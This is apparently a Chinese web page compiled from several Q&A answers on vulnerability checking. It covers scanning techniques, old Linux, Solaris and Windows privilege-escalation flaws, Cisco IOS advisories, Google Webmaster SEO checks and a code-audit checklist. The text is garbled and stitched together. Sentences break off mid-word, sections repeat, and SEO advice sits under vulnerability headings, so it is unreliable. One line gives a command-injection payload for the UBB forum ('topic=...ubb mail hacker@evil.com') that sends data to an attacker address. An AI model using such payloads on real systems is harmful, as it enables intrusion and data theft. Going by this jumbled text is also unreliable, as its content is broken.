網(wǎng)絡(luò)漏洞檢查的方法(漏洞檢測(cè)的幾種方法)
1.漏洞檢測(cè)的幾種方法
漏洞掃描有以下四種檢測(cè)技術(shù):
1.基于應(yīng)用的檢測(cè)技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置,發(fā)現(xiàn)安全漏洞。
2.基于主機(jī)的檢測(cè)技術(shù)。它采用被動(dòng)的、非破壞性的辦法對(duì)系統(tǒng)進(jìn)行檢測(cè)。通常,它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補(bǔ)丁等。這種技術(shù)還包括口令解密、把一些簡(jiǎn)單的口令剔除。因此,這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問(wèn)題,發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點(diǎn)是與平臺(tái)相關(guān),升級(jí)復(fù)雜。
3.基于目標(biāo)的漏洞檢測(cè)技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫(kù)、注冊(cè)號(hào)等。通過(guò)消息文摘算法,對(duì)文件的加密數(shù)進(jìn)行檢驗(yàn)。這種技術(shù)的實(shí)現(xiàn)是運(yùn)行在一個(gè)閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗(yàn)數(shù),把這些檢驗(yàn)數(shù)同原來(lái)的檢驗(yàn)數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
4.基于網(wǎng)絡(luò)的檢測(cè)技術(shù)。它采用積極的、非破壞性的辦法來(lái)檢驗(yàn)系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為,然后對(duì)結(jié)果進(jìn)行分析。它還針對(duì)已知的網(wǎng)絡(luò)漏洞進(jìn)行檢驗(yàn)。網(wǎng)絡(luò)檢測(cè)技術(shù)常被用來(lái)進(jìn)行穿透實(shí)驗(yàn)和安全審記。這種技術(shù)可以發(fā)現(xiàn)一系列平臺(tái)的漏洞,也容易安裝。但是,它可能會(huì)影響網(wǎng)絡(luò)的性能。
網(wǎng)絡(luò)漏洞掃描
在上述四種方式當(dāng)中,網(wǎng)絡(luò)漏洞掃描最為適合我們的Web信息系統(tǒng)的風(fēng)險(xiǎn)評(píng)估工作,其掃描原理和工作原理為:通過(guò)遠(yuǎn)程檢測(cè)目標(biāo)主機(jī)TCP/IP不同端口的服務(wù),記錄目標(biāo)的回答。通過(guò)這種方法,可以搜集到很多目標(biāo)主機(jī)的各種信息(例如:是否能用匿名登錄,是否有可寫的FTP目錄,是否能用Telnet, ?Cl ?Cfroot,可以直接以root身份登錄到系統(tǒng)而無(wú)須提供口令。 二.本地管理員權(quán)限 攻擊者在已有一個(gè)本地賬號(hào)能夠登錄到系統(tǒng)的情況下,通過(guò)攻擊本地某些有缺陷的suid程序,競(jìng)爭(zhēng)條件等手段,得到系統(tǒng)的管理員權(quán)限。
典型漏洞: 1、RedHat Linux的restore是個(gè)suid程序,它的執(zhí)行依靠一個(gè)中RSH的環(huán)境變量,通過(guò)設(shè)置環(huán)境變量PATH,可以使RSH變量中的可執(zhí)行程序以root身份運(yùn)行,從而獲得系統(tǒng)的root權(quán)限。 2、Solaris 7的Xsun程序有suid位,它對(duì)輸入?yún)?shù)未做有效的邊界檢查,可以很容易地溢出它的緩沖區(qū),以root身份運(yùn)行我們指定的代碼,從而獲得管理員權(quán)限。
3、在windows2000下,攻擊者就有機(jī)會(huì)讓網(wǎng)絡(luò)DDE(一種在不同的Windows機(jī)器上的應(yīng)用程序之間動(dòng)態(tài)共享數(shù)據(jù)的技術(shù))代理在本地系統(tǒng)用戶的安全上下文中執(zhí)行其指定的代碼,從而提升權(quán)限并完全控制本地機(jī)器。 三.普通用戶訪問(wèn)權(quán)限 攻擊者利用服務(wù)器的漏洞,取得系統(tǒng)的普通用戶存取權(quán)限,對(duì)UNIX類系統(tǒng)通常是shell訪問(wèn)權(quán)限,對(duì)Windows系統(tǒng)通常是cmd.exe的訪問(wèn)權(quán)限,能夠以一般用戶的身份執(zhí)行程序,存取文件。
攻擊者通常攻擊以非root身份運(yùn)行的守護(hù)進(jìn)程,有缺陷的cgi程序等手段獲得這種訪問(wèn)權(quán)限。 典型漏洞: 1、UBB是個(gè)廣泛運(yùn)行于各種UNIX和Windows系統(tǒng)的論壇程序,用PERL實(shí)現(xiàn),它的5.19以下版本存在輸入驗(yàn)證問(wèn)題,通過(guò)提交精心構(gòu)造的表單內(nèi)容,可以使UBB去執(zhí)行shell命令,因?yàn)橐话愕膚eb服務(wù)器以nobody身份運(yùn)行,因此可以得到一個(gè)nobody shell。
比如提交這樣的數(shù)據(jù):topic='012345.ubb mail hacker@evil.com 2、RedHat Linux 6.2帶的innd 2.2.2.3版新聞服務(wù)器,存在緩沖區(qū)溢出漏洞,通過(guò)一個(gè)精心構(gòu)造的新聞信件可以使innd服務(wù)器以news身份運(yùn)行我們指定的代碼,得到一個(gè)innd權(quán)限的shell。 3、Windows IIS 4.0-5.0存在Unicode解碼漏洞,可以使攻擊者利用cmd.exe以guest組的權(quán)限在系統(tǒng)上運(yùn)行程序。
相當(dāng)于取得了普通用戶的權(quán)限。 四.權(quán)限提升 攻擊者在本地通過(guò)攻擊某些有缺陷的sgid程序,把自己的權(quán)限提升到某個(gè)非root用戶的水平。
獲得管理員權(quán)限可以看做是一種特殊的權(quán)限提升,只是因?yàn)橥{的大小不同而把它獨(dú)立出來(lái)。 典型漏洞: 1、RedHat Linux 6.1帶的man程序?yàn)閟gid man,它存在format bug,通過(guò)對(duì)它的溢出攻擊,可以使攻擊者得到man組的用戶權(quán)限。
2、Solaris 7的write程序?yàn)閟gid tty,它存在緩沖區(qū)溢出問(wèn)題,通過(guò)對(duì)它的攻擊可以攻擊者得到tty組的用戶權(quán)限。 3、WindowsNT系統(tǒng)中,攻擊者能夠使系統(tǒng)中其他用戶裝入一個(gè)”特洛化”的porfile,使其他用戶執(zhí)行攻擊者的惡意代碼,有時(shí)甚至是管理員。
4.應(yīng)該怎樣檢查網(wǎng)站的漏洞
愛(ài)問(wèn)網(wǎng)絡(luò):
第一:robots文件檢查
整個(gè)網(wǎng)站不能收錄或某個(gè)目錄下所有頁(yè)面都不能收錄,經(jīng)常是因?yàn)閞obots.txt文件差錯(cuò)引起的。網(wǎng)管工具抓工具權(quán)限部分顯示出Google所抓取的robots文件內(nèi)容。站長(zhǎng)也可以在這里試驗(yàn)不同的robots文件指令,然后輸入一個(gè)網(wǎng)址,測(cè)試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個(gè)字母差錯(cuò)都可能造成致命影響。有了這個(gè)工具,站長(zhǎng)可以確保robots文件中的每一行代碼正確,不會(huì)錯(cuò)誤禁止應(yīng)該被收錄的文件或目錄。
第二:首選域設(shè)置
站長(zhǎng)可以設(shè)置Google應(yīng)該收錄帶還是不帶的網(wǎng)址版本,稱為首選域。
當(dāng)然,在Google網(wǎng)管工具設(shè)置的首選域?qū)Π俣鹊绕渌阉饕嫱耆黄鹱饔谩_@只是解決Google網(wǎng)址規(guī)范化的輔助手段,不能完全依靠這個(gè)設(shè)置,正確合理的網(wǎng)站結(jié)構(gòu)才是解決問(wèn)題的根本方法。站長(zhǎng)也可以在這部分設(shè)置網(wǎng)站目標(biāo)地理區(qū)域。
第三:關(guān)鍵詞排名
在搜索查詢部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結(jié)果顯示次數(shù)、點(diǎn)擊次數(shù)、點(diǎn)擊率和平均排名。
網(wǎng)管工具則列出了網(wǎng)站真是排名及點(diǎn)擊數(shù)字。這也為SEO人員提供了搜索結(jié)果點(diǎn)擊分布的另一組數(shù)據(jù),可以用于搜索流量預(yù)估。不過(guò),要注意的是,網(wǎng)管工具中列出的點(diǎn)擊率,很多時(shí)候與網(wǎng)站權(quán)重、知名度、頁(yè)面標(biāo)題標(biāo)簽的寫作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點(diǎn)擊情況。
第四:外部鏈接
Google的link:指令非常不準(zhǔn)確,基本不能用來(lái)看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準(zhǔn)確的多,還有雅虎的linkdomain:指令查外鏈也不錯(cuò)。而且可以看出是全站鏈接還是只鏈?zhǔn)醉?yè)。SEO人員可以一目了然的看到網(wǎng)站上哪些頁(yè)面最受歡迎。
第五:網(wǎng)站內(nèi)容
網(wǎng)管工具關(guān)鍵詞部分實(shí)際上列出的是Google在網(wǎng)站上抓取的最常見(jiàn)關(guān)鍵詞。查看這些常見(jiàn)關(guān)鍵詞,對(duì)頁(yè)面尤其是首頁(yè)的文案撰寫和修改有重要意義。
第六:內(nèi)部鏈接
內(nèi)部鏈接部分列出所有頁(yè)面的內(nèi)部鏈接數(shù)。站長(zhǎng)可以從這些數(shù)據(jù)中大致看到網(wǎng)站內(nèi)部鏈接結(jié)構(gòu)是否有重大缺陷。如果全站主導(dǎo)航中出現(xiàn)的分類首頁(yè)內(nèi)部鏈接數(shù)非常低,很可能說(shuō)明導(dǎo)航系統(tǒng)有問(wèn)題。
內(nèi)部鏈接數(shù)的另外一個(gè)作用是反映出網(wǎng)站收錄頁(yè)面數(shù)。Google的site:指令也不太準(zhǔn)確,而且現(xiàn)在越來(lái)越不準(zhǔn)確,經(jīng)常不能反映出收錄數(shù)字。網(wǎng)管工具中內(nèi)部鏈接部分列出的首頁(yè)內(nèi)部鏈接總數(shù),大致上就相當(dāng)于Google收錄的頁(yè)面總數(shù),因?yàn)榫W(wǎng)站上每一個(gè)頁(yè)面都應(yīng)該有到首頁(yè)的鏈接。
第七:抓取錯(cuò)誤及統(tǒng)計(jì)
抓取錯(cuò)誤部分列出404錯(cuò)誤(頁(yè)面不存在)、被robots文件禁止而不能收錄的頁(yè)面等。
其中404錯(cuò)誤對(duì)檢查網(wǎng)站上是否存在錯(cuò)誤鏈接很有用。對(duì)每個(gè)404錯(cuò)誤,網(wǎng)管工具都列出了到這個(gè)網(wǎng)址的鏈接。如果到不存在頁(yè)面的鏈接是網(wǎng)站內(nèi)部發(fā)出的,說(shuō)明這些鏈接頁(yè)面上的鏈接地址有錯(cuò)誤。如果鏈接向不存在頁(yè)面的是其他網(wǎng)站,站長(zhǎng)可以嘗試聯(lián)系對(duì)方更改錯(cuò)誤鏈接到正確位置。
第八:HTML建議
查看Google的HTML建議是尋找網(wǎng)站上可能出現(xiàn)的復(fù)制內(nèi)容的最簡(jiǎn)便方法。網(wǎng)管工具列出了重復(fù)的說(shuō)明標(biāo)簽及標(biāo)題標(biāo)簽個(gè)數(shù)和具體頁(yè)面。標(biāo)題標(biāo)簽重復(fù),實(shí)際上說(shuō)明這些頁(yè)面本身內(nèi)容重復(fù),往往是網(wǎng)站結(jié)構(gòu)造成的。要注意的是,有時(shí)候網(wǎng)管工具中列出的數(shù)據(jù)并不完整,一般來(lái)說(shuō)博客上標(biāo)題標(biāo)簽重復(fù)的頁(yè)面絕不止兩頁(yè)。
第九:模擬蜘蛛抓取
站長(zhǎng)可以輸入自己網(wǎng)站上的任何一個(gè)網(wǎng)址,網(wǎng)管工具會(huì)發(fā)出Google蜘蛛,實(shí)時(shí)抓取頁(yè)面內(nèi)容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁(yè)面代碼。顯然這隊(duì)站長(zhǎng)確認(rèn)轉(zhuǎn)向設(shè)置和檢查服務(wù)器是否正確返回內(nèi)容很有幫助。另外,這個(gè)工具也可以用來(lái)檢查頁(yè)面是否被黑。有的時(shí)候hei/k放入的代碼會(huì)檢查瀏覽器類型,如果是用戶使用的普通瀏覽器訪問(wèn)則返回正常內(nèi)容,如果是搜索引擎蜘蛛訪問(wèn),才返回hei/k加上去的垃圾內(nèi)容和垃圾鏈接。所以站長(zhǎng)自己訪問(wèn)頁(yè)面看不出任何問(wèn)題。Google蜘蛛抓取到的卻不是站長(zhǎng)自己看到的內(nèi)容。這個(gè)工具可以幫助站長(zhǎng)檢查頁(yè)面是否存在安全漏洞。
第十:網(wǎng)站性能
網(wǎng)站速度現(xiàn)在越來(lái)越被重視,不僅對(duì)排名有影響,對(duì)用戶體驗(yàn)也有很大的影響。
5.網(wǎng)絡(luò)安全漏洞及解決方案都有哪些
1、TCP數(shù)據(jù)包問(wèn)題:在特定版本的IOS中,存在內(nèi)存泄漏漏洞,可導(dǎo)致DOS工具,美國(guó)CERT的一份安全警報(bào)如此寫道。
2、IPv6路由數(shù)據(jù)幀頭缺陷:IOS可能不能正確的處理IPv6(互聯(lián)網(wǎng)協(xié)議第六版)數(shù)據(jù)包的特定格式的路由數(shù)據(jù)頭,可能導(dǎo)致一個(gè)DOS攻擊或者運(yùn)行任何惡意代碼。IPv6是一套可以讓我們?cè)诨ヂ?lián)網(wǎng)上獲得更多IP地址一套規(guī)范。
3、欺騙性的IP選項(xiàng)漏洞:這是一個(gè)IOS在處理具有特定的欺騙性的IP選項(xiàng)的IPv4數(shù)據(jù)包的時(shí)候存在的安全漏洞,據(jù)CERT說(shuō),它也可以導(dǎo)致DOS攻擊或運(yùn)行任意惡毒代碼。
CERT表示,所有三個(gè)漏洞都可能導(dǎo)致設(shè)備重新加載它的操作系統(tǒng)。這情況下,一種間接的持續(xù)性的DOS情況就有可能發(fā)生,因?yàn)閿?shù)據(jù)包已經(jīng)不能通過(guò)該設(shè)備了。
據(jù)CERT表示,由于運(yùn)行IOS的設(shè)備可能要針對(duì)許多其他的網(wǎng)絡(luò)來(lái)轉(zhuǎn)發(fā)數(shù)據(jù),因此這種拒絕服務(wù)攻擊的間接影響所帶來(lái)的后果可能是 非常嚴(yán)重的。
據(jù)思科公司在其安全公告中表示,公司已經(jīng)發(fā)布了針對(duì)這些漏洞的補(bǔ)丁軟件。據(jù)思科公司補(bǔ)充道:它目前還不未得知有利用這些漏洞的攻擊出現(xiàn)。不過(guò),據(jù)IBM公司互聯(lián)網(wǎng)安全系統(tǒng)的安全戰(zhàn)略主管奧爾曼表示,由于這些漏洞的嚴(yán)重性,用戶需要盡快安裝補(bǔ)丁軟件。據(jù)他表示,從他們的監(jiān)測(cè)來(lái)看,有許多黑客正在試圖利用這些漏洞。
建議使用金山清理專家或360安全衛(wèi)士,掃描電腦上的漏洞,并修復(fù)。
6.怎么檢查系統(tǒng)漏洞
有以下四種檢測(cè)技術(shù):
1、基于應(yīng)用的檢測(cè)技術(shù)。
它采用被動(dòng)的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置,發(fā)現(xiàn)安全漏洞。
2、基于主機(jī)的檢測(cè)技術(shù)。
它采用被動(dòng)的、非破壞性的辦法對(duì)系統(tǒng)進(jìn)行檢測(cè)。通常,它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補(bǔ)丁等。這種技術(shù)還包括口令解密、把一些簡(jiǎn)單的口令剔除。因此,這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問(wèn)題,發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點(diǎn)是與平臺(tái)相關(guān),升級(jí)復(fù)雜。
3、基于目標(biāo)的漏洞檢測(cè)技術(shù)。
它采用被動(dòng)的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫(kù)、注冊(cè)號(hào)等。通過(guò)消息文摘算法,對(duì)文件的加密數(shù)進(jìn)行檢驗(yàn)。這種技術(shù)的實(shí)現(xiàn)是運(yùn)行在一個(gè)閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗(yàn)數(shù),把這些檢驗(yàn)數(shù)同原來(lái)的檢驗(yàn)數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
基于目標(biāo)的漏洞檢測(cè)技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫(kù)、注冊(cè)號(hào)等。通過(guò)消息文摘算法,對(duì)文件的加密數(shù)進(jìn)行檢驗(yàn)。這種技術(shù)的實(shí)現(xiàn)是運(yùn)行在一個(gè)閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗(yàn)數(shù),把這些檢驗(yàn)數(shù)同原來(lái)的檢驗(yàn)數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
4、基于網(wǎng)絡(luò)的檢測(cè)技術(shù)。
采用積極的、非破壞性的辦法來(lái)檢驗(yàn)系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為,然后對(duì)結(jié)果進(jìn)行分析。它還針對(duì)已知的網(wǎng)絡(luò)漏洞進(jìn)行檢驗(yàn)。網(wǎng)絡(luò)檢測(cè)技術(shù)常被用來(lái)進(jìn)行穿透實(shí)驗(yàn)和安全審計(jì)。這種技術(shù)可以發(fā)現(xiàn)一系列平臺(tái)的漏洞,也容易安裝。但是,它可能會(huì)影響網(wǎng)絡(luò)的性能。
7.應(yīng)該怎樣檢查網(wǎng)站的漏洞
愛(ài)問(wèn)網(wǎng)絡(luò):第一:robots文件檢查整個(gè)網(wǎng)站不能收錄或某個(gè)目錄下所有頁(yè)面都不能收錄,經(jīng)常是因?yàn)閞obots.txt文件差錯(cuò)引起的。
網(wǎng)管工具抓工具權(quán)限部分顯示出Google所抓取的robots文件內(nèi)容。站長(zhǎng)也可以在這里試驗(yàn)不同的robots文件指令,然后輸入一個(gè)網(wǎng)址,測(cè)試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個(gè)字母差錯(cuò)都可能造成致命影響。有了這個(gè)工具,站長(zhǎng)可以確保robots文件中的每一行代碼正確,不會(huì)錯(cuò)誤禁止應(yīng)該被收錄的文件或目錄。
第二:首選域設(shè)置站長(zhǎng)可以設(shè)置Google應(yīng)該收錄帶還是不帶的網(wǎng)址版本,稱為首選域。當(dāng)然,在Google網(wǎng)管工具設(shè)置的首選域?qū)Π俣鹊绕渌阉饕嫱耆黄鹱饔谩?/p>
這只是解決Google網(wǎng)址規(guī)范化的輔助手段,不能完全依靠這個(gè)設(shè)置,正確合理的網(wǎng)站結(jié)構(gòu)才是解決問(wèn)題的根本方法。站長(zhǎng)也可以在這部分設(shè)置網(wǎng)站目標(biāo)地理區(qū)域。
第三:關(guān)鍵詞排名在搜索查詢部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結(jié)果顯示次數(shù)、點(diǎn)擊次數(shù)、點(diǎn)擊率和平均排名。網(wǎng)管工具則列出了網(wǎng)站真是排名及點(diǎn)擊數(shù)字。
這也為SEO人員提供了搜索結(jié)果點(diǎn)擊分布的另一組數(shù)據(jù),可以用于搜索流量預(yù)估。不過(guò),要注意的是,網(wǎng)管工具中列出的點(diǎn)擊率,很多時(shí)候與網(wǎng)站權(quán)重、知名度、頁(yè)面標(biāo)題標(biāo)簽的寫作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點(diǎn)擊情況。
第四:外部鏈接Google的link:指令非常不準(zhǔn)確,基本不能用來(lái)看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準(zhǔn)確的多,還有雅虎的linkdomain:指令查外鏈也不錯(cuò)。
而且可以看出是全站鏈接還是只鏈?zhǔn)醉?yè)。SEO人員可以一目了然的看到網(wǎng)站上哪些頁(yè)面最受歡迎。
第五:網(wǎng)站內(nèi)容網(wǎng)管工具關(guān)鍵詞部分實(shí)際上列出的是Google在網(wǎng)站上抓取的最常見(jiàn)關(guān)鍵詞。查看這些常見(jiàn)關(guān)鍵詞,對(duì)頁(yè)面尤其是首頁(yè)的文案撰寫和修改有重要意義。
第六:內(nèi)部鏈接內(nèi)部鏈接部分列出所有頁(yè)面的內(nèi)部鏈接數(shù)。站長(zhǎng)可以從這些數(shù)據(jù)中大致看到網(wǎng)站內(nèi)部鏈接結(jié)構(gòu)是否有重大缺陷。
如果全站主導(dǎo)航中出現(xiàn)的分類首頁(yè)內(nèi)部鏈接數(shù)非常低,很可能說(shuō)明導(dǎo)航系統(tǒng)有問(wèn)題。內(nèi)部鏈接數(shù)的另外一個(gè)作用是反映出網(wǎng)站收錄頁(yè)面數(shù)。
Google的site:指令也不太準(zhǔn)確,而且現(xiàn)在越來(lái)越不準(zhǔn)確,經(jīng)常不能反映出收錄數(shù)字。網(wǎng)管工具中內(nèi)部鏈接部分列出的首頁(yè)內(nèi)部鏈接總數(shù),大致上就相當(dāng)于Google收錄的頁(yè)面總數(shù),因?yàn)榫W(wǎng)站上每一個(gè)頁(yè)面都應(yīng)該有到首頁(yè)的鏈接。
第七:抓取錯(cuò)誤及統(tǒng)計(jì)抓取錯(cuò)誤部分列出404錯(cuò)誤(頁(yè)面不存在)、被robots文件禁止而不能收錄的頁(yè)面等。其中404錯(cuò)誤對(duì)檢查網(wǎng)站上是否存在錯(cuò)誤鏈接很有用。
對(duì)每個(gè)404錯(cuò)誤,網(wǎng)管工具都列出了到這個(gè)網(wǎng)址的鏈接。如果到不存在頁(yè)面的鏈接是網(wǎng)站內(nèi)部發(fā)出的,說(shuō)明這些鏈接頁(yè)面上的鏈接地址有錯(cuò)誤。
如果鏈接向不存在頁(yè)面的是其他網(wǎng)站,站長(zhǎng)可以嘗試聯(lián)系對(duì)方更改錯(cuò)誤鏈接到正確位置。第八:HTML建議查看Google的HTML建議是尋找網(wǎng)站上可能出現(xiàn)的復(fù)制內(nèi)容的最簡(jiǎn)便方法。
網(wǎng)管工具列出了重復(fù)的說(shuō)明標(biāo)簽及標(biāo)題標(biāo)簽個(gè)數(shù)和具體頁(yè)面。標(biāo)題標(biāo)簽重復(fù),實(shí)際上說(shuō)明這些頁(yè)面本身內(nèi)容重復(fù),往往是網(wǎng)站結(jié)構(gòu)造成的。
要注意的是,有時(shí)候網(wǎng)管工具中列出的數(shù)據(jù)并不完整,一般來(lái)說(shuō)博客上標(biāo)題標(biāo)簽重復(fù)的頁(yè)面絕不止兩頁(yè)。第九:模擬蜘蛛抓取站長(zhǎng)可以輸入自己網(wǎng)站上的任何一個(gè)網(wǎng)址,網(wǎng)管工具會(huì)發(fā)出Google蜘蛛,實(shí)時(shí)抓取頁(yè)面內(nèi)容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁(yè)面代碼。
顯然這隊(duì)站長(zhǎng)確認(rèn)轉(zhuǎn)向設(shè)置和檢查服務(wù)器是否正確返回內(nèi)容很有幫助。另外,這個(gè)工具也可以用來(lái)檢查頁(yè)面是否被黑。
有的時(shí)候hei/k放入的代碼會(huì)檢查瀏覽器類型,如果是用戶使用的普通瀏覽器訪問(wèn)則返回正常內(nèi)容,如果是搜索引擎蜘蛛訪問(wèn),才返回hei/k加上去的垃圾內(nèi)容和垃圾鏈接。所以站長(zhǎng)自己訪問(wèn)頁(yè)面看不出任何問(wèn)題。
Google蜘蛛抓取到的卻不是站長(zhǎng)自己看到的內(nèi)容。這個(gè)工具可以幫助站長(zhǎng)檢查頁(yè)面是否存在安全漏洞。
第十:網(wǎng)站性能網(wǎng)站速度現(xiàn)在越來(lái)越被重視,不僅對(duì)排名有影響,對(duì)用戶體驗(yàn)也有很大的影響。
8.安全漏洞的檢查方法
建立安全模型
1、熟悉軟件功能、功能實(shí)現(xiàn),配置等;
如:IIS的虛擬目錄、腳本映射;
2、根據(jù)功能,分析安全需求,建立安全模型;
IIS外掛,文件類型識(shí)別,目錄正確識(shí)別;目錄限制;
外掛的特點(diǎn);權(quán)限不是在文件對(duì)象上,需要自己識(shí)別文件,所以需要識(shí)別出同一個(gè)文件的所有文件名;
3、根據(jù)安全需求,分析編程應(yīng)注意的地方,重點(diǎn)檢查。
IIS要對(duì)../進(jìn)行檢測(cè),連接文件的處理,識(shí)別出正確的目錄、文件名;編程接口完全按接口實(shí)現(xiàn); 1、通讀原代碼;
2、安全需求里面重點(diǎn)需要檢測(cè)的地方;
3、搜索容易有問(wèn)題的函數(shù)調(diào)用,如strcpy、strcat、*printf、free、strncpy等;
4、常見(jiàn)一些編程問(wèn)題;一些變量類型,如長(zhǎng)度變量用int,注意一些函數(shù)非直接返回賦值問(wèn)題等,一些邊界條件,記數(shù)從0開始還是從1開始。
5、分析緩沖區(qū)使用的代碼;
6、輸入輸出合法檢測(cè);
7、編程接口調(diào)用;了解操作系統(tǒng)、基本文件、進(jìn)程調(diào)用等的特性;
8、數(shù)據(jù)結(jié)構(gòu);
9、安全領(lǐng)域的最小原則; 1、測(cè)試;
(1)、熟悉輸入輸出;
(2)、根據(jù)需要編寫測(cè)試程序;
(3)、輸入輸出各種特殊情況測(cè)試,特殊字符、長(zhǎng)串;
(4)、安全需求需要檢測(cè)的一些條件測(cè)試;
2、反匯編分析;
(1)、閱讀理解反匯編代碼;
(2)、安全需求檢測(cè)的代碼分析;
(3)、調(diào)用接口代碼分析;
(4)、sub esp,xxx 代碼分析緩沖;
(5)、strcpy、strcat、*printf、free、strncpy等調(diào)用分析;
(6)、輸入輸出檢測(cè);
3、跟蹤調(diào)試;
(1)、異常的攔截分析;
(2)、一些字符串的流向,讀寫斷點(diǎn); 1、分析總結(jié)各種漏洞、漏洞原因、編程問(wèn)題,補(bǔ)丁修補(bǔ)方法,編程怎么避免。
2、對(duì)漏洞歸納分類,全面考慮;
